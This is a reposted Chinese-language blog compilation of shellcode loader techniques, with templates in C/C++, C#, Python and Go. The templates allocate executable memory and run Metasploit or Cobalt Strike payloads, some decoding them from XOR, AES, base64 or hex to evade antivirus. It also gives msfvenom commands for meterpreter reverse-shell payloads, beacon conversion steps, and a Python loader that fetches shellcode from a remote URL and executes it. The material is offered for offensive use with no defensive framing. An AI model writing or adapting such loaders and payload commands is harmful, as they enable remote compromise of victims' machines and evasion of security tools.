转载-shellcode加载总结 · Uknow - Stay hungry Stay foolish
C/C++
源码加载
利用动态申请内存
#include <windows.h>
#include <stdio.h>
typedef void (_stdcall *CODE)();
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] ="";
void main()
{
PVOID p = NULL;
p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (p == NULL)
{
return;
}
memcpy(p, shellcode, sizeof(shellcode));
CODE code = (CODE)p;
code();
}
强制类型转换成函数指针
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] ="";
void main()
{
((void(WINAPI*)(void))&shellcode)();
}
嵌入式汇编呼叫shellcode
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
__asm
{
mov eax, offset shellcode
jmp eax
}
}
伪指令
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
__asm
{
mov eax, offset shellcode
_emit 0xFF
_emit 0xE0
}
}
xor加密
/*
Author: Arno0x0x, Twitter: @Arno0x0x
*/
#include "stdafx.h"
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
// Encrypted shellcode and cipher key obtained from shellcode_encoder.py
char encryptedShellcode[] = "";
char key[] = "uknowsec";
char cipherType[] = "xor";
// Char array to host the deciphered shellcode
char shellcode[sizeof encryptedShellcode];
// XOR decoding stub using the key defined above must be the same as the encoding key
int j = 0;
for (int i = 0; i < sizeof encryptedShellcode; i++) {
if (j == sizeof key - 1) j = 0;
shellcode[i] = encryptedShellcode[i] ^ key[j];
j++;
}
// Allocating memory with EXECUTE writes
void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Copying deciphered shellcode into memory as a function
memcpy(exec, shellcode, sizeof shellcode);
// Call the shellcode
((void(*)())exec)();
}
加载器
C++.加载shellcode方式的payload到内存
https://github.com/clinicallyinane/shellcode_launcher/
生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -e x86/shikata_ga_nai -i 5 -f raw > test.c
shellcode 加载
shellcode_launcher.exe -i test.c
C以十六进制的方式执行shellcode
https://github.com/DimopoulosElias/SimpleShellcodeInjector
生成shellcode
msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=443 -f c -o msf.txt
cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
加载shellcode
Csharp
源码加载
直接加载
using System;
using System.Runtime.InteropServices;
namespace TCPMeterpreterProcess
{
class Program
{
static void Main(string[] args)
{
// native function’s compiled code
// generated with metasploit
byte[] shellcode = new byte[333] {
};
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
IntPtr pinfo = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport("kernel32")]
private static extern IntPtr GetModuleHandle(
string moduleName
);
[DllImport("kernel32")]
private static extern UInt32 GetProcAddress(
IntPtr hModule,
string procName
);
[DllImport("kernel32")]
private static extern UInt32 LoadLibrary(
string lpFileName
);
[DllImport("kernel32")]
private static extern UInt32 GetLastError();
}
}
using System;
using System.Threading;
using System.Runtime.InteropServices;
namespace MSFWrapper
{
public class Program
{
public Program()
{
RunMSF();
}
public static void RunMSF()
{
byte[] MsfPayload = {
//Paste your Payload here
};
IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
Thread.Sleep(2000);
}
public static void Main()
{
}
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
}
保存代码后,修改该工程的属性,将输出类型改为“Windows 应用程序”,启动对象改为“MSFWrapper.Program”并保存。
aes加密
/*
Author: Arno0x0x, Twitter: @Arno0x0x
How to compile:
===============
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:encryptedShellcodeWrapper_aes.exe encryptedShellcodeWrapper_aes.cs
*/
using System;
using System.IO;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
namespace RunShellCode
{
static class Program
{
//==============================================================================
// CRYPTO FUNCTIONS
//==============================================================================
private static T[] SubArray<T>(this T[] data, int index, int length)
{
T[] result = new T[length];
Array.Copy(data, index, result, 0, length);
return result;
}
private static byte[] xor(byte[] cipher, byte[] key) {
byte[] decrypted = new byte[cipher.Length];
for(int i = 0; i < cipher.Length; i++) {
decrypted[i] = (byte) (cipher[i] ^ key[i % key.Length]);
}
return decrypted;
}
//--------------------------------------------------------------------------------------------------
// Decrypts the given a plaintext message byte array with a given 128 bits key
// Returns the unencrypted message
//--------------------------------------------------------------------------------------------------
private static byte[] aesDecrypt(byte[] cipher, byte[] key)
{
var IV = cipher.SubArray(0, 16);
var encryptedMessage = cipher.SubArray(16, cipher.Length - 16);
// Create an AesManaged object with the specified key and IV.
using (AesManaged aes = new AesManaged())
{
aes.Padding = PaddingMode.PKCS7;
aes.KeySize = 128;
aes.Key = key;
aes.IV = IV;
using (MemoryStream ms = new MemoryStream())
{
using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(), CryptoStreamMode.Write))
{
cs.Write(encryptedMessage, 0, encryptedMessage.Length);
}
return ms.ToArray();
}
}
}
//==============================================================================
// MAIN FUNCTION
//==============================================================================
static void Main()
{
byte[] encryptedShellcode = new byte[] { };
string key = "Nv78rga+vzeTO+acx4EXCw==";
string cipherType = "aes";
byte[] shellcode = null;
//--------------------------------------------------------------
// Decrypt the shellcode
if (cipherType == "xor") {
shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));
}
else if (cipherType == "aes") {
shellcode = aesDecrypt(encryptedShellcode, Convert.FromBase64String(key));
}
//--------------------------------------------------------------
// Copy decrypted shellcode to memory
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// Prepare data
IntPtr pinfo = IntPtr.Zero;
// Invoke the shellcode
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
// The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(
UInt32 lpStartAddr,
UInt32 size,
UInt32 flAllocationType,
UInt32 flProtect
);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
}
xor加密
/*
Author: Arno0x0x, Twitter: @Arno0x0x
How to compile:
===============
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:encryptedShellcodeWrapper_xor.exe encryptedShellcodeWrapper_xor.cs
*/
using System;
using System.IO;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
namespace RunShellCode
{
static class Program
{
//==============================================================================
// CRYPTO FUNCTIONS
//==============================================================================
private static T[] SubArray<T>(this T[] data, int index, int length)
{
T[] result = new T[length];
Array.Copy(data, index, result, 0, length);
return result;
}
private static byte[] xor(byte[] cipher, byte[] key) {
byte[] decrypted = new byte[cipher.Length];
for(int i = 0; i < cipher.Length; i++) {
decrypted[i] = (byte) (cipher[i] ^ key[i % key.Length]);
}
return decrypted;
}
//--------------------------------------------------------------------------------------------------
// Decrypts the given a plaintext message byte array with a given 128 bits key
// Returns the unencrypted message
//--------------------------------------------------------------------------------------------------
private static byte[] aesDecrypt(byte[] cipher, byte[] key)
{
var IV = cipher.SubArray(0, 16);
var encryptedMessage = cipher.SubArray(16, cipher.Length - 16);
// Create an AesManaged object with the specified key and IV.
using (AesManaged aes = new AesManaged())
{
aes.Padding = PaddingMode.PKCS7;
aes.KeySize = 128;
aes.Key = key;
aes.IV = IV;
using (MemoryStream ms = new MemoryStream())
{
using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(), CryptoStreamMode.Write))
{
cs.Write(encryptedMessage, 0, encryptedMessage.Length);
}
return ms.ToArray();
}
}
}
//==============================================================================
// MAIN FUNCTION
//==============================================================================
static void Main()
{
byte[] encryptedShellcode = new byte[] { };
string key = "uknowsec";
string cipherType = "xor";
byte[] shellcode = null;
//--------------------------------------------------------------
// Decrypt the shellcode
if (cipherType == "xor") {
shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));
}
else if (cipherType == "aes") {
shellcode = aesDecrypt(encryptedShellcode, Convert.FromBase64String(key));
}
//--------------------------------------------------------------
// Copy decrypted shellcode to memory
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// Prepare data
IntPtr pinfo = IntPtr.Zero;
// Invoke the shellcode
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
// The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(
UInt32 lpStartAddr,
UInt32 size,
UInt32 flAllocationType,
UInt32 flProtect
);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
}
从资源里加载shelllcode
https://github.com/rvrsh3ll/CPLResourceRunner
用Cobalt Strike 生成shellcode
Attacks -> Packages -> Windows Executable (s) -> Output => RAW (x86)
用ConvertShellcode.py将生成的 beacon.bin转换成shellcode.txt
然后再转换成base64编码。
root@kali:~/Desktop# python ConvertShellcode.py beacon.bin
Shellcode written to shellcode.txt
root@kali:~/Desktop# cat shellcode.txt |sed 's/[, ]//g; s/0x//g;' |tr -d '\n' |xxd -p -r |gzip -c |base64 > b64shellcode.txt
把生成的base64编码的shellcode复制到项目资源Resources.txt里
编译生成dll。
copy CPLResourceRunner.dll to RunMe.cpl
三好学生-CPL文件利用介绍
Python
源码加载
import urllib2
import ctypes
import base64
# 从我们的web服务器上下载shellcode
url = "http://rinige.com/shellcode.bin"
response = urllib2.urlopen(url)
# base64 解码 shellcode
shellcode = base64.b64decode(response.read())
# 申请内存空间
shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))
# 创建 shellcode 的函数指针
shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE¬
(ctypes.c_void_p))
# 执行 shellcode
shellcode_func()
#!/usr/bin/python
import ctypes
shellcode = bytearray("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
PyInstaller将py转为exe
pyinstaller同样可以将.py程序打包成windows下可以执行的exe文件。 pyinstaller依赖于pywin32,在使用pyinstaller之前,应先安装pywin32
pywin32下载后,点击下一步安装即可Python for Windows Extensions - Browse /pywin32 at SourceForge.net pyinstaller 下载后,解压,不用安装,即可使用https://github.com/pyinstaller/pyinstaller/releases
python pyinstaller -F -w pyshellcode.py
生成的exe文件3MB。
xor加密
#!/usr/bin/python
# -*- coding: utf8 -*-
# Author: Arno0x0x, Twitter: @Arno0x0x
#
# You can create a windows executable: pyinstaller --onefile --noconsole multibyteEncodedShellcode.py
from Crypto.Cipher import AES
from ctypes import *
import base64
#======================================================================================================
# CRYPTO FUNCTIONS
#======================================================================================================
#------------------------------------------------------------------------
# data as a bytearray
# key as a string
def xor(data, key):
l = len(key)
keyAsInt = map(ord, key)
return bytes(bytearray((
(data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
)))
#------------------------------------------------------------------------
def unpad(s):
"""PKCS7 padding removal"""
return s[:-ord(s[len(s)-1:])]
#------------------------------------------------------------------------
def aesDecrypt(cipherText, key):
"""Decrypt data with the provided key"""
# Initialization Vector is in the first 16 bytes
iv = cipherText[:AES.block_size]
cipher = AES.new(key, AES.MODE_CBC, iv)
return unpad(cipher.decrypt(cipherText[AES.block_size:]))
#======================================================================================================
# MAIN FUNCTION
#======================================================================================================
if __name__ == '__main__':
encryptedShellcode = ("")
key = "uknowsec"
cipherType = "xor"
# Decrypt the shellcode
if cipherType == 'xor':
shellcode = xor(bytearray(encryptedShellcode), key)
elif cipherType == 'aes':
key = base64.b64decode(key)
shellcode = aesDecrypt(encryptedShellcode, key)
else:
print "[ERROR] Unknown cipher type"
# Copy the shellcode to memory and invoke it
memory_with_shell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memory_with_shell,CFUNCTYPE(c_void_p))
shell()
aes加密
#!/usr/bin/python
# -*- coding: utf8 -*-
# Author: Arno0x0x, Twitter: @Arno0x0x
#
# You can create a windows executable: pyinstaller --onefile --noconsole multibyteEncodedShellcode.py
from Crypto.Cipher import AES
from ctypes import *
import base64
#======================================================================================================
# CRYPTO FUNCTIONS
#======================================================================================================
#------------------------------------------------------------------------
# data as a bytearray
# key as a string
def xor(data, key):
l = len(key)
keyAsInt = map(ord, key)
return bytes(bytearray((
(data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
)))
#------------------------------------------------------------------------
def unpad(s):
"""PKCS7 padding removal"""
return s[:-ord(s[len(s)-1:])]
#------------------------------------------------------------------------
def aesDecrypt(cipherText, key):
"""Decrypt data with the provided key"""
# Initialization Vector is in the first 16 bytes
iv = cipherText[:AES.block_size]
cipher = AES.new(key, AES.MODE_CBC, iv)
return unpad(cipher.decrypt(cipherText[AES.block_size:]))
#======================================================================================================
# MAIN FUNCTION
#======================================================================================================
if __name__ == '__main__':
encryptedShellcode = ("")
key = "Nv78rga+vzeTO+acx4EXCw=="
cipherType = "aes"
# Decrypt the shellcode
if cipherType == 'xor':
shellcode = xor(bytearray(encryptedShellcode), key)
elif cipherType == 'aes':
key = base64.b64decode(key)
shellcode = aesDecrypt(encryptedShellcode, key)
else:
print "[ERROR] Unknown cipher type"
# Copy the shellcode to memory and invoke it
memory_with_shell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memory_with_shell,CFUNCTYPE(c_void_p))
shell()
base64加密
import ctypes
import base64
encode_shellcode = ""
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
加载器
Python免杀ShellCode加载器(Cobaltstrike/Metasploit)
HEX加密
#scrun by k8gege
import ctypes
import sys
#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
shellcode=bytearray(sys.argv[1].decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
base64加密
#scrun by k8gege
import ctypes
import sys
import base64
#calc.exe
#REJDM0Q5NzQyNEY0QkVFODVBMjcxMzVGMzFDOUIxMzMzMTc3MTc4M0M3MDQwMzlGNDlDNUU2QTM4NjgwMDk1QjU3RjM4MEJFNjYyMUY2Q0JEQkY1N0M5OUQ3N0VEMDA5NjNGMkZEM0VDNEI5REI3MUQ1MEZFNEREMTUxMTk4MUY0QUYxQTFEMDlGRjBFNjBDNkZBMEJGNUJDMjU1Q0IxOURGNTQxQjE2NUYyRjFFRTgxNDg1MjEzODg0OTI2QUEwQUVGRDRBRDE2MzFFQjY5ODA4RDU0QzFCRDkyN0FDMkEyNUVCOTM4M0E4RjVENDIzNTM4MDJFNTBFRTkzRjQyQjM0MTFFOThCQkY4MUM5MkExMzU3OTkyMEQ4MTNDNTI0REZGMDdENTA1NEY3NTFEMTJFREM3NUJBRjU3RDJGNjY1QjgxMkZDRTA0MjczQkZDNTE1MTY2NkFBN0QzMUNEM0E3RUIxRTczQzBEQTk1MUM5N0UyN0Y1OTY3QTkyMkNCRTA3NEI3NEU2RDg3NkQ4Qzg4MDQ4NDZDNkYxNEVENjkyQjkyMUQwMzI0NzcyMkIwNDU1MjQxNTdENjNFQThGMjVFQTRCNA==
shellcode=bytearray(base64.b64decode(sys.argv[1]).decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
Go
内联C加载
package main
import "C"
import "unsafe"
func main() {
buf := ""
buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
...省略...
buf += "\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2"
// at your call site, you can send the shellcode directly to the C
// function by converting it to a pointer of the correct type.
shellcode := []byte(buf)
C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}
加载器
https://github.com/brimstone/go-shellcode
生成hex格式的shellcode
msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
加载器进行加载
c:\windows\temp>sc.exe shellcode